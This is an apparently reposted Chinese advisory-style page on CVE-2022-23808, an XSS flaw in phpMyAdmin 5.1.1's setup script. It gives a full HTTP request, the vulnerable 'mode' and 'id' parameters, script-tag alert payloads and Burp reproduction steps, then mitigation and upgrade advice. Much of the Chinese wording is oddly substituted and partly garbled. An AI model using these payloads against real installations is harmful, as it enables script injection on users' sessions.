phpMyAdmin 5.1.1 XSS漏洞 CVE-2022-23808

破绽描绘

曾经发现了一系列弱点,这些弱点可能允许攻击者将歹意代码注入装置脚本的各个方面,从而允许 XSS 或 HTML 注入。
 


 

受影响的版本

phpMyAdmin 5.1.2 之前的 5.1 分支的版本遭到影响。
 


 

破绽应用

GET /phpmyadmin/setup/index.php?page=servers&mode=test&id=test  HTTP/1.1     
Host: 127.0.0.1:1234      
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0     
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8     
Accept-Language: en-US,en;q=0.5    
Connection: close  
Cookie: pma_lang=en; phpMyAdmin=fs55xxxxxxx; pma_lang=en; pmaUser-1=xxxxxxxxxxxxxxxxxxxxxxxxxxx; phpMyAdmin=xxxxxxxxxxxxxxx; pmaAuth-1=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx          
Upgrade-Insecure-Requests: 1         
Cache-Control: max-age=0       

  
 

易受攻击的参数

mode
id
 

有效载荷
alert(document.domain)

">'><script>alert(document.domain)</script>

 

重现步骤

在 burp 中捕获高于 reuqest。
用易受攻击的参数交换/更改 XSS 有效负载。
单击发送并在阅读器中显现响应。
你会弹出!

图片[1]-phpMyAdmin 5.1.1  XSS漏洞 CVE-2022-23808-孤勇者社区
 


 

处理方法

缓解

带有配置文件 config.inc.php 的 phpMyAdmin 装置将不允许访问设置脚本,这反过来又减轻了这种攻击。
 

晋级版本

晋级到 phpMyAdmin 5.1.2 或更新版本或应用下面列出的补丁。
 https://www.phpmyadmin.net/files/5.1.1/
 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞15赞赏 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片